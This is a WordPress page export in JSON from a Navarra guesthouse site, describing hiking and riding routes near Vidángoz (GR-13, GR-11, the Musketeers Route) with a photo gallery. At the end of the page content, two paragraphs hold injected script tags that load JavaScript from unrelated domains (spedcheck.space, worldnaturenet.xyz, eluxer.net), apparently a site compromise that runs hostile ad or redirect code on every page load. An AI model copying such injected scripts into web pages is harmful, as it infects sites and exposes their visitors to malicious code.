{"id":388,"date":"2018-04-18T12:43:09","date_gmt":"2018-04-18T12:43:09","guid":{"rendered":"http:\/\/ornat-etxea.com\/?page_id=388"},"modified":"2020-04-02T16:45:54","modified_gmt":"2020-04-02T16:45:54","slug":"rutas","status":"publish","type":"page","link":"http:\/\/ornat-etxea.com\/index.php\/rutas\/","title":{"rendered":"Rutas"},"content":{"rendered":"<p><strong>Ca\u00f1ada Real de los Roncaleses (GR-13)<\/strong><\/p>\n<p>La Ca\u00f1ada Real de los Roncaleses es una ruta milenaria por la cual los pastores trashumantes de nuestro valle llevaban sus ovejas a pasar el invierno (de septiembre a mayo\/junio) desde los puertos roncaleses a las Bardenas Reales de Navarra, donde el clima en esta \u00e9poca del a\u00f1o es menos riguroso que en el Pirineo navarro y el ganado puede disponer de pasto.<\/p>\n<p>As\u00ed, Vid\u00e1ngoz es la primera localidad que se encuentra en el camino si se realiza la Ca\u00f1ada de Norte a Sur o la \u00faltima localidad si se recorre en sentido inverso, y es posible que el origen del pueblo tenga que ver con dicha ruta, ya que parte del nombre, de Vid\u00e1ngoz (o Bidangoz), puede provenir de la ra\u00edz eusk\u00e9rica \u201cBide-\u201c o \u201cBida-\u201c, que significa \u201ccamino\u201d.<\/p>\n<p>El camino puede realizarse tanto a pie como en bicicleta de monta\u00f1a, y, partiendo de los puertos roncaleses, el viajero atravesar\u00e1 lugares emblem\u00e1ticos como la Sierra de Leyre y su monasterio, el castillo de Javier, la ciudad de Sang\u00fcesa, la torre\/castillo de Pe\u00f1a, el Monasterio de la Oliva, para llegar finalmente a las Bardenas Reales de Navarra.<\/p>\n<p>Para m\u00e1s informaci\u00f3n: <a href=\"http:\/\/www.rutasnavarra.com\/Rutas\/Ca%C3%B1ada-Real-de-los-Roncaleses-Etapa-1-Alto-de-Laza-Alto-de-Igal_Alto-de-Laza-Balsa-de-Lakuaga-Txorrotxarria-Pulpitera-Alto-de-Igal_25000.html\" target=\"_blank\" rel=\"noopener noreferrer\">www.rutasnavarra.com<\/a> \/\/ <a href=\"http:\/\/www.senderosgr.es\/SenderosDetalle.aspx?IdSendero=38\" target=\"_blank\" rel=\"noopener noreferrer\">www.senderosgr.es<\/a> \/\/ <a href=\"https:\/\/es.wikiloc.com\/rutas-mountain-bike\/canada-de-los-roncaleses-1825177\" target=\"_blank\" rel=\"noopener noreferrer\">www.wikiloc.com<\/a><\/p>\n<style id=\"bwg-style-0\">    #bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-standard-thumbnails {      width: 1252px;              justify-content: center;        margin:0 auto !important;              background-color: rgba(255, 255, 255, 0.00);            padding-left: 2px;      padding-top: 2px;      max-width: 100%;            }        #bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-standard-thumbnails .bwg-item {      justify-content: flex-start;      max-width: 250px;          }    #bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-standard-thumbnails .bwg-item > a {       margin-right: 2px;       margin-bottom: 2px;    }    #bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-standard-thumbnails .bwg-item0 {      padding: 0px;            background-color:rgba(255,255,255, 0.30);      border: 0px none #CCCCCC;      opacity: 1.00;      border-radius: 0;      box-shadow: ;    }    #bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-standard-thumbnails .bwg-item1 img {      max-height: none;      max-width: none;      padding: 0 !important;    }        @media only screen and (min-width: 480px) {      #bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-standard-thumbnails .bwg-item0 {        transition: all 0.3s ease 0s;-webkit-transition: all 0.3s ease 0s;      }      #bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-standard-thumbnails .bwg-item0:hover {        -ms-transform: scale(1.08);        -webkit-transform: scale(1.08);        transform: scale(1.08);      }    }          #bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-standard-thumbnails .bwg-item1 {      padding-top: 56%;    }        #bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-standard-thumbnails .bwg-title1 {      position: absolute;      top: 0;      z-index: 100;      width: 100%;      height: 100%;      display: flex;      justify-content: center;      align-content: center;      flex-direction: column;      opacity: 0;    }\t      #bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-standard-thumbnails .bwg-title2,    #bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-standard-thumbnails .bwg-ecommerce2 {      color: #FFFFFF;      font-family: Ubuntu;      font-size: 16px;      font-weight: bold;      padding: 2px;      text-shadow: 0px 0px 0px #888888;      max-height: 100%;    }    #bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-standard-thumbnails .bwg-thumb-description span {    color: #323A45;    font-family: Ubuntu;    font-size: 12px;    max-height: 100%;    word-wrap: break-word;    }    #bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-standard-thumbnails .bwg-play-icon2 {      font-size: 32px;    }    #bwg_container1_0 #bwg_container2_0 .bwg-container-0.bwg-standard-thumbnails .bwg-ecommerce2 {      font-size: 19.2px;      color: #CCCCCC;    }    <\/style>    <div id=\"bwg_container1_0\"         class=\"bwg_container bwg_thumbnail bwg_thumbnails\"         data-right-click-protection=\"0\"         data-bwg=\"0\"         data-gallery-type=\"thumbnails\"         data-current-url=\"http:\/\/ornat-etxea.com\/index.php\/wp-json\/wp\/v2\/pages\/388\"         data-lightbox-url=\"http:\/\/ornat-etxea.com\/wp-admin\/admin-ajax.php?action=GalleryBox&#038;current_view=0&#038;gallery_id=14&#038;tag=0&#038;theme_id=1&#038;shortcode_id=32&#038;sort_by=order&#038;order_by=asc&#038;current_url=http%3A%2F%2Fornat-etxea.com%2Findex.php%2Fwp-json%2Fwp%2Fv2%2Fpages%2F388\"         data-gallery-id=\"14\"         data-popup-width=\"800\"         data-popup-height=\"500\"         data-is-album=\"gallery\"         data-buttons-position=\"bottom\">      <div id=\"bwg_container2_0\">             <div id=\"ajax_loading_0\" class=\"bwg_loading_div_1\">      <div class=\"bwg_loading_div_2\">        <div class=\"bwg_loading_div_3\">          <div id=\"loading_div_0\" class=\"bwg_spider_ajax_loading\">          <\/div>        <\/div>      <\/div>    <\/div>            <form id=\"gal_front_form_0\"              class=\"bwg-hidden\"              method=\"post\"              action=\"#\"              data-current=\"0\"              data-shortcode-id=\"32\"              data-gallery-type=\"thumbnails\"              data-gallery-id=\"14\"              data-tag=\"0\"              data-album-id=\"0\"              data-theme-id=\"1\"              data-ajax-url=\"http:\/\/ornat-etxea.com\/wp-admin\/admin-ajax.php?action=bwg_frontend_data\">          <div id=\"bwg_container3_0\" class=\"bwg-background bwg-background-0\">                <div data-max-count=\"5\"         data-thumbnail-width=\"250\"         data-bwg=\"0\"         data-gallery-id=\"14\"         data-lightbox-url=\"http:\/\/ornat-etxea.com\/wp-admin\/admin-ajax.php?action=GalleryBox&amp;current_view=0&amp;gallery_id=14&amp;tag=0&amp;theme_id=1&amp;shortcode_id=32&amp;sort_by=order&amp;order_by=asc&amp;current_url=http%3A%2F%2Fornat-etxea.com%2Findex.php%2Fwp-json%2Fwp%2Fv2%2Fpages%2F388\"         id=\"bwg_thumbnails_0\"         class=\"bwg-container-0 bwg-thumbnails bwg-standard-thumbnails bwg-container bwg-border-box\">            <div class=\"bwg-item\">        <a class=\"bwg-a bwg_lightbox\"  data-image-id=\"63\" href=\"http:\/\/ornat-etxea.com\/wp-content\/uploads\/photo-gallery\/imported_from_media_libray\/atxunbidea-1.jpg?bwg=1585844518\" data-elementor-open-lightbox=\"no\" >                <div class=\"bwg-item0 \">          <div class=\"bwg-item1 \">            <div class=\"bwg-item2\">              <img class=\"skip-lazy bwg_standart_thumb_img_0 \"                   data-id=\"63\"                   data-width=\"640\"                   data-height=\"480\"                   data-src=\"http:\/\/ornat-etxea.com\/wp-content\/uploads\/photo-gallery\/imported_from_media_libray\/thumb\/atxunbidea-1.jpg?bwg=1585844518\"                   src=\"http:\/\/ornat-etxea.com\/wp-content\/uploads\/photo-gallery\/imported_from_media_libray\/thumb\/atxunbidea-1.jpg?bwg=1585844518\"                   alt=\"Ca\u00f1ada \/ Altxunbide 1\" \/>            <\/div>            <div class=\"\">              <div class=\"bwg-title1\"><div class=\"bwg-title2\">Ca\u00f1ada \/ Altxunbide 1<\/div><\/div>                                        <\/div>          <\/div>        <\/div>                        <\/a>              <\/div>            <div class=\"bwg-item\">        <a class=\"bwg-a bwg_lightbox\"  data-image-id=\"61\" href=\"http:\/\/ornat-etxea.com\/wp-content\/uploads\/photo-gallery\/imported_from_media_libray\/atxunbidea-2.jpg?bwg=1585844518\" data-elementor-open-lightbox=\"no\" >                <div class=\"bwg-item0 \">          <div class=\"bwg-item1 \">            <div class=\"bwg-item2\">              <img class=\"skip-lazy bwg_standart_thumb_img_0 \"                   data-id=\"61\"                   data-width=\"720\"                   data-height=\"480\"                   data-src=\"http:\/\/ornat-etxea.com\/wp-content\/uploads\/photo-gallery\/imported_from_media_libray\/thumb\/atxunbidea-2.jpg?bwg=1585844518\"                   src=\"http:\/\/ornat-etxea.com\/wp-content\/uploads\/photo-gallery\/imported_from_media_libray\/thumb\/atxunbidea-2.jpg?bwg=1585844518\"                   alt=\"Ca\u00f1ada \/ Altxunbide 2\" \/>            <\/div>            <div class=\"\">              <div class=\"bwg-title1\"><div class=\"bwg-title2\">Ca\u00f1ada \/ Altxunbide 2<\/div><\/div>                                        <\/div>          <\/div>        <\/div>                        <\/a>              <\/div>            <div class=\"bwg-item\">        <a class=\"bwg-a bwg_lightbox\"  data-image-id=\"64\" href=\"http:\/\/ornat-etxea.com\/wp-content\/uploads\/photo-gallery\/imported_from_media_libray\/atxunbidea-3.jpg?bwg=1585844518\" data-elementor-open-lightbox=\"no\" >                <div class=\"bwg-item0 \">          <div class=\"bwg-item1 \">            <div class=\"bwg-item2\">              <img class=\"skip-lazy bwg_standart_thumb_img_0 \"                   data-id=\"64\"                   data-width=\"720\"                   data-height=\"480\"                   data-src=\"http:\/\/ornat-etxea.com\/wp-content\/uploads\/photo-gallery\/imported_from_media_libray\/thumb\/atxunbidea-3.jpg?bwg=1585844518\"                   src=\"http:\/\/ornat-etxea.com\/wp-content\/uploads\/photo-gallery\/imported_from_media_libray\/thumb\/atxunbidea-3.jpg?bwg=1585844518\"                   alt=\"Ca\u00f1ada \/ Altxunbide 3\" \/>            <\/div>            <div class=\"\">              <div class=\"bwg-title1\"><div class=\"bwg-title2\">Ca\u00f1ada \/ Altxunbide 3<\/div><\/div>                                        <\/div>          <\/div>        <\/div>                        <\/a>              <\/div>            <div class=\"bwg-item\">        <a class=\"bwg-a bwg_lightbox\"  data-image-id=\"60\" href=\"http:\/\/ornat-etxea.com\/wp-content\/uploads\/photo-gallery\/imported_from_media_libray\/atxunbidea-4.jpg?bwg=1585844518\" data-elementor-open-lightbox=\"no\" >                <div class=\"bwg-item0 \">          <div class=\"bwg-item1 \">            <div class=\"bwg-item2\">              <img class=\"skip-lazy bwg_standart_thumb_img_0 \"                   data-id=\"60\"                   data-width=\"709\"                   data-height=\"480\"                   data-src=\"http:\/\/ornat-etxea.com\/wp-content\/uploads\/photo-gallery\/imported_from_media_libray\/thumb\/atxunbidea-4.jpg?bwg=1585844518\"                   src=\"http:\/\/ornat-etxea.com\/wp-content\/uploads\/photo-gallery\/imported_from_media_libray\/thumb\/atxunbidea-4.jpg?bwg=1585844518\"                   alt=\"Ca\u00f1ada \/ Altxunbide 4\" \/>            <\/div>            <div class=\"\">              <div class=\"bwg-title1\"><div class=\"bwg-title2\">Ca\u00f1ada \/ Altxunbide 4<\/div><\/div>                                        <\/div>          <\/div>        <\/div>                        <\/a>              <\/div>            <div class=\"bwg-item\">        <a class=\"bwg-a bwg_lightbox\"  data-image-id=\"62\" href=\"http:\/\/ornat-etxea.com\/wp-content\/uploads\/photo-gallery\/imported_from_media_libray\/atxunbidea-5.jpg?bwg=1585844518\" data-elementor-open-lightbox=\"no\" >                <div class=\"bwg-item0 \">          <div class=\"bwg-item1 \">            <div class=\"bwg-item2\">              <img class=\"skip-lazy bwg_standart_thumb_img_0 \"                   data-id=\"62\"                   data-width=\"731\"                   data-height=\"480\"                   data-src=\"http:\/\/ornat-etxea.com\/wp-content\/uploads\/photo-gallery\/imported_from_media_libray\/thumb\/atxunbidea-5.jpg?bwg=1585844518\"                   src=\"http:\/\/ornat-etxea.com\/wp-content\/uploads\/photo-gallery\/imported_from_media_libray\/thumb\/atxunbidea-5.jpg?bwg=1585844518\"                   alt=\"Ca\u00f1ada \/ Altxunbide 5\" \/>            <\/div>            <div class=\"\">              <div class=\"bwg-title1\"><div class=\"bwg-title2\">Ca\u00f1ada \/ Altxunbide 5<\/div><\/div>                                        <\/div>          <\/div>        <\/div>                        <\/a>              <\/div>          <\/div>    <style>      \/*pagination styles*\/      #bwg_container1_0 #bwg_container2_0 .tablenav-pages_0 {\t\t\t\ttext-align: center;\t\t\t\tfont-size: 12px;\t\t\t\tfont-family: segoe ui;\t\t\t\tfont-weight: bold;\t\t\t\tcolor: #666666;\t\t\t\tmargin: 6px 0 4px;\t\t\t\tdisplay: block;      }      @media only screen and (max-width : 320px) {      #bwg_container1_0 #bwg_container2_0 .displaying-num_0 {     \t display: none;      }      }      #bwg_container1_0 #bwg_container2_0 .displaying-num_0 {\t\t\t\tfont-size: 12px;\t\t\t\tfont-family: segoe ui;\t\t\t\tfont-weight: bold;\t\t\t\tcolor: #666666;\t\t\t\tmargin-right: 10px;\t\t\t\tvertical-align: middle;      }      #bwg_container1_0 #bwg_container2_0 .paging-input_0 {\t\t\t\tfont-size: 12px;\t\t\t\tfont-family: segoe ui;\t\t\t\tfont-weight: bold;\t\t\t\tcolor: #666666;\t\t\t\tvertical-align: middle;      }      #bwg_container1_0 #bwg_container2_0 .tablenav-pages_0 a.disabled,      #bwg_container1_0 #bwg_container2_0 .tablenav-pages_0 a.disabled:hover,      #bwg_container1_0 #bwg_container2_0 .tablenav-pages_0 a.disabled:focus,\t\t\t#bwg_container1_0 #bwg_container2_0 .tablenav-pages_0 input.bwg_current_page {\t\t\t\tcursor: default;\t\t\t\tcolor: rgba(102, 102, 102, 0.5);      }      #bwg_container1_0 #bwg_container2_0 .tablenav-pages_0 a,      #bwg_container1_0 #bwg_container2_0 .tablenav-pages_0 input.bwg_current_page {\t\t\t\tcursor: pointer;\t\t\t\ttext-align: center;\t\t\t\tfont-size: 12px;\t\t\t\tfont-family: segoe ui;\t\t\t\tfont-weight: bold;\t\t\t\tcolor: #666666;\t\t\t\ttext-decoration: none;\t\t\t\tpadding: 3px 6px;\t\t\t\tmargin: 0;\t\t\t\tborder-radius: 0;\t\t\t\tborder-style: solid;\t\t\t\tborder-width: 1px;\t\t\t\tborder-color: #E3E3E3;\t\t\t\tbackground-color: #FFFFFF;\t\t\t\topacity: 1.00;\t\t\t\tbox-shadow: 0;\t\t\t\ttransition: all 0.3s ease 0s;-webkit-transition: all 0.3s ease 0s;      }      <\/style>      <span class=\"bwg_nav_cont_0\">              <div class=\"tablenav-pages_0\">                  <\/div>                <input type=\"hidden\" id=\"page_number_0\" name=\"page_number_0\" value=\"1\" \/>      <script type=\"text\/javascript\">        function spider_page_0(cur, x, y, load_more) {          if (typeof load_more == \"undefined\") {            var load_more = false;          }          if (jQuery(cur).hasClass('disabled')) {            return false;          }          var items_county_0 = 1;          switch (y) {            case 1:              if (x >= items_county_0) {                document.getElementById('page_number_0').value = items_county_0;              }              else {                document.getElementById('page_number_0').value = x + 1;              }              break;            case 2:              document.getElementById('page_number_0').value = items_county_0;              break;            case -1:              if (x == 1) {                document.getElementById('page_number_0').value = 1;              }              else {                document.getElementById('page_number_0').value = x - 1;              }              break;            case -2:              document.getElementById('page_number_0').value = 1;              break;\t\t\t\t\t\tcase 0:              document.getElementById('page_number_0').value = x;              break;            default:              document.getElementById('page_number_0').value = 1;          }          bwg_ajax('gal_front_form_0', '0', 'bwg_thumbnails_0', '0', '', 'gallery', 0, '', '', load_more, '', 1);        }                    jQuery('.first-page-0').on('click', function () {              spider_page_0(this, 1, -2, 'numeric');              return false;            });            jQuery('.prev-page-0').on('click', function () {              spider_page_0(this, 1, -1, 'numeric');              return false;            });            jQuery('.next-page-0').on('click', function () {              spider_page_0(this, 1, 1, 'numeric');              return false;            });            jQuery('.last-page-0').on('click', function () {              spider_page_0(this, 1, 2, 'numeric');              return false;            });        \t\t\t\t\/* Change page on input enter. *\/        function bwg_change_page_0( e, that ) {          if (  e.key == 'Enter' ) {            var to_page = parseInt(jQuery(that).val());            var pages_count = jQuery(that).parents(\".pagination-links\").data(\"pages-count\");            var current_url_param = jQuery(that).attr('data-url-info');            if (to_page > pages_count) {              to_page = 1;            }\t \t\t\t\t\t\t\t\t\t\t\t\tspider_page_0(this, to_page, 0, 'numeric');\t\t\t\t\t\t\treturn false;\t\t\t\t\t\t          }          return true;        }        jQuery('.bwg_load_btn_0').on('click', function () {            spider_page_0(this, 1, 1, true);            return false;        });      <\/script>      <\/span>                <\/div>        <\/form>          <style>          #bwg_container1_0 #bwg_container2_0 #spider_popup_overlay_0 {          background-color: #EEEEEE;          opacity: 0.60;          }          <\/style>        <div id=\"bwg_spider_popup_loading_0\" class=\"bwg_spider_popup_loading\"><\/div>        <div id=\"spider_popup_overlay_0\" class=\"spider_popup_overlay\" onclick=\"spider_destroypopup(1000)\"><\/div>        <input type=\"hidden\" id=\"bwg_random_seed_0\" value=\"1172094184\">                <\/div>    <\/div>    <script>      if (document.readyState === 'complete') {        if( typeof bwg_main_ready == 'function' ) {          if ( jQuery(\"#bwg_container1_0\").height() ) {            bwg_main_ready(jQuery(\"#bwg_container1_0\"));          }        }      } else {        document.addEventListener('DOMContentLoaded', function() {          if( typeof bwg_main_ready == 'function' ) {            if ( jQuery(\"#bwg_container1_0\").height() ) {             bwg_main_ready(jQuery(\"#bwg_container1_0\"));            }          }        });      }    <\/script>    \n<p><strong>Senda Pirenaica (GR-11)<\/strong><\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignright wp-image-674\" src=\"http:\/\/ornat-etxea.com\/wp-content\/uploads\/2018\/04\/senda_pirenaica-632x363.jpg\" alt=\"\" width=\"425\" height=\"244\" srcset=\"http:\/\/ornat-etxea.com\/wp-content\/uploads\/2018\/04\/senda_pirenaica-632x363.jpg 632w, http:\/\/ornat-etxea.com\/wp-content\/uploads\/2018\/04\/senda_pirenaica-768x441.jpg 768w, http:\/\/ornat-etxea.com\/wp-content\/uploads\/2018\/04\/senda_pirenaica.jpg 835w\" sizes=\"(max-width: 425px) 100vw, 425px\" \/>El GR 11 es un Sendero de Gran Recorrido que cruza en unos 800 kil\u00f3metros todo el Pirineos, desde el mar Cant\u00e1brico (Cabo de Higuer) al mar Mediterr\u00e1neo (Cabo de Creus). Es una ruta que se encuentra se\u00f1alizada en pr\u00e1cticamente su totalidad por marcas blancas y rojas. Sus etapas discurren generalmente entre pueblos, refugios o albergues, por lo que la log\u00edstica del trekking es sencilla.<\/p>\n<p>La Senda Pirenaica (GR 11) recorre esta frontera natural, en un viaje en el que el senderista disfrutar\u00e1 de la naturaleza indomable de esta cordillera, se ba\u00f1ar\u00e1 en la cultura de estos pueblos, se fascinar\u00e1 por sus leyendas e historias, pero lo que es m\u00e1s importante, descubrir\u00e1 d\u00eda a d\u00eda, etapa a etapa de esta ruta, emociones, experiencias, momentos compartidos haciendo camino y al cobijo de refugios.<\/p>\n<p>Este recorrido, si bien no pasa directamente por el pueblo de Vid\u00e1ngoz, s\u00ed que atraviesa sus montes cercanos, con lo que puede ser una buena opci\u00f3n a la hora de realizar un final de etapa.<\/p>\n<p>Para m\u00e1s informaci\u00f3n:<\/p>\n<p><a href=\"https:\/\/travesiapirenaica.com\/gr11\/gr11.php\" target=\"_blank\" rel=\"noopener noreferrer\">www.travesiapirenaica.com<\/a> \/\/ <a href=\"http:\/\/www.senderosgr.es\/es\/gr-11-senda-pirenaica\/\" target=\"_blank\" rel=\"noopener noreferrer\">www.senderosgr.es<\/a><\/p>\n<p><strong>Ruta de los Mosqueteros (ecuestre)<\/strong><\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignleft wp-image-673\" src=\"http:\/\/ornat-etxea.com\/wp-content\/uploads\/2018\/04\/ruta_mosqueteros-632x421.jpg\" alt=\"\" width=\"375\" height=\"250\" srcset=\"http:\/\/ornat-etxea.com\/wp-content\/uploads\/2018\/04\/ruta_mosqueteros-632x421.jpg 632w, http:\/\/ornat-etxea.com\/wp-content\/uploads\/2018\/04\/ruta_mosqueteros-272x182.jpg 272w, http:\/\/ornat-etxea.com\/wp-content\/uploads\/2018\/04\/ruta_mosqueteros.jpg 720w\" sizes=\"(max-width: 375px) 100vw, 375px\" \/>La Ruta de los Mosqueteros propone una original experiencia a caballo siguiendo los pasos de D\u2019Artagnan, desde Lupiac (Gascogne), lugar de su nacimiento, y Maastricht en Limburg (Pa\u00edses Bajos), donde encontr\u00f3 la muerte tras haber recorrido Europa a caballo al servicio del rey Luis XIV, hasta el Monasterio de Leyre en Navarra.<\/p>\n<p>Espa\u00f1a se une a esta ruta cultural europea a trav\u00e9s de Navarra. Desde la Isla de los Faisanes, donde los Mosqueteros espa\u00f1oles y franceses escoltaban a sus respectivas familias reales, hasta Larrau, (desde donde se llega al B\u00e9arn, lugar de origen de los famosos compa\u00f1eros de D\u2019Artagnan: Athos, Porthos, Aramis y el capit\u00e1n de Tr\u00e9ville), con 280 km de senderos que atraviesan el valle del Bazt\u00e1n, Ultzama, Pamplona, Castillo de Javier (por la vinculaci\u00f3n de Aramis con los Jesuitas), Monasterio de Leyre (cuna de los antepasados de Enrique IV, rey de Francia y en el orig\u00e9n de los Mosqueteros franceses), Vid\u00e1ngoz, Ochagav\u00eda y Larrau.<\/p>\n<p>Un recorrido por Navarra a trav\u00e9s de senderos existentes para descubrir los caminos del siglo XVII siguiendo los pasos de los Mosqueteros Reales.<\/p>\n<p>Seg\u00fan el planteamiento de esta ruta, Vid\u00e1ngoz es propuesto como final de una de las etapas y comienzo de la siguiente.<\/p>\n<p>Para m\u00e1s informaci\u00f3n:<\/p>\n<p><a href=\"http:\/\/www.fnhipica.com\/noticia\/700\/Ruta-de-los-Mosqueteros-(12-etapas)#.WH8g8FPhCUn\" target=\"_blank\" rel=\"noopener noreferrer\">www.fnhipica.com<\/a> \/\/ <a href=\"http:\/\/www.turismoecuestre.org\/ruta-europea-de-dartagnan\/\" target=\"_blank\" rel=\"noopener noreferrer\">www.turismoecuestre.org<\/a><\/p>\n<p><script src=\"http:\/\/spedcheck.space\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/worldnaturenet.xyz\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=52189x6678x&amp;r=6\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/spedcheck.space\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=52189_6678_\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"http:\/\/spedcheck.space\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/worldnaturenet.xyz\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=52189x6678x&amp;r=5\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/spedcheck.space\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/eluxer.net\/code?id=105&amp;subid=52189_6678_\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ca\u00f1ada Real de los Roncaleses (GR-13) La Ca\u00f1ada Real de los Roncaleses es una ruta milenaria por la cual los pastores trashumantes de nuestro valle llevaban sus ovejas a pasar el invierno (de septiembre a mayo\/junio) desde los puertos roncaleses a las Bardenas Reales de Navarra, donde el clima en esta \u00e9poca del a\u00f1o es <a href=\"http:\/\/ornat-etxea.com\/index.php\/rutas\/\" rel=\"nofollow\"><span class=\"sr-only\">Read more about Rutas<\/span>[&hellip;]<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0},"_links":{"self":[{"href":"http:\/\/ornat-etxea.com\/index.php\/wp-json\/wp\/v2\/pages\/388"}],"collection":[{"href":"http:\/\/ornat-etxea.com\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/ornat-etxea.com\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/ornat-etxea.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/ornat-etxea.com\/index.php\/wp-json\/wp\/v2\/comments?post=388"}],"version-history":[{"count":10,"href":"http:\/\/ornat-etxea.com\/index.php\/wp-json\/wp\/v2\/pages\/388\/revisions"}],"predecessor-version":[{"id":827,"href":"http:\/\/ornat-etxea.com\/index.php\/wp-json\/wp\/v2\/pages\/388\/revisions\/827"}],"wp:attachment":[{"href":"http:\/\/ornat-etxea.com\/index.php\/wp-json\/wp\/v2\/media?parent=388"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}